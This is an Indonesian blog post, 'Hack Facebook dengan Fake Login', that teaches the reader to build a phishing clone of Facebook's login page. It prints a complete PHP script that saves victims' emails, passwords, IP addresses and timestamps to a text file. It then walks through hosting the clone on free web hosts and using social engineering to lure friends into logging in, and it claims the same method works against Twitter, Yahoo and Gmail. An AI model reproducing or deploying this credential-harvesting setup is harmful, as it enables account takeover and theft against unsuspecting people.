Fake login? Apa itu?
Fake login adalah dimana seorang member suatu website (Misal Facebook) melakukan login.. maka username dan password akan dikirim ke suatu file php dan diautentikasi.
Disini kita akan memanipulasi dengan cara username dan password yang harus nya dikirim ke facebook akan kita alikan ke file .txt kita. Dan selanjutnya bisa ditebak, kita masuk dengan username dan password itu. Tanpa banyak basa-basi lagi, ayo kita lakukan.
Cara (Step by Step)
1. Anda harus memiliki akun di hostingan yang support php dan html, sampai sekarang penulis belum menemukan tempat yang kompatibel untuk php dan html. Jadi disini saya menggunakan 2 hostingan. Yang pertama saya gunakan 000webhost.com untuk menaruh php dan 50webs.com untuk menaruh html.. ribet ya, namanya juga gratisan
2. Trus anda membuka www.facebook.com dengan Mozilla firefox. Setelah selesai di buka, klik CTRL + U. Dan muncul kode-kode lalu di kopi paste ke file txt. (namanya index.txt)
3. Buat skrip logs.php, file inilah untuk melakukan manipulasi dan penulisan.
Code:
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "";
?>
4. setelah ditulis, save kedalam logs.php. Lalu upload ke server 000webhost.com. Sebagai contoh namanya websitenya http://facebookis.netau.net. Jadi alamat logs anda adalah http://facebookis.netau.net/logs.php
5. buka file facebook yang kita kopas (index.txt) lalu tekan CTRL + F. Lalu kita ketikkan “POST” (tanpa tanda kutip). Ada banyak kata “POST” yang ditemukan, misal kita ketemu post, lalu lihat kode berikutnya, jika kode berikutnya kira-kira seperti ini “
6. Upload index.html ke hostingan 50webs.com, misal nama website kita adalah http://facebookis.50webs.com/index.html.
7. suruh teman anda login disitu (tentunya dengan teknik SOCIAL ENGINEERING). Lalu perhatikan apa yang terjadi???
8. Yap, username dan password teman anda ke arah file anda. Tepatnya di http://facebookis.netau.net/logs.txt. (Kalau masih bingung, lihat kode sebelumnya)
9. Selesai deh, tetapi cara mendaftar di 50webs.com dan 000webhost.com tidak saya terangkan, karena sangat mudah (bilang aja males..... ;-))
10. Terkadang sangat menjengkelkan, kita buka txtnya malah tidak terbaca, nah mendingan buka akun 000webhost anda dan masuk ke file manager dimana tempat anda upload. Disitu pasti ada logs.txt nya, nah buka dari situ aja............ dijamin ada.
Penting :
1. Trik ini bisa dilakukan untuk fake login twitter, yahoo, gmail, dsb.... tetapi ada satu teknik lagi, yaitu manipulasi ID html, saya akan menjelaskan mungkin lain kali..
2. Saya sudah mencoba dan berhasil, jadi anda tidak perlu ragu untuk bertanya.
3. Teknik ini menuntut anda untuk mempelajari lebih dalam bahasa html dan php
One Responses to "Hack Facebook dengan Fake Login"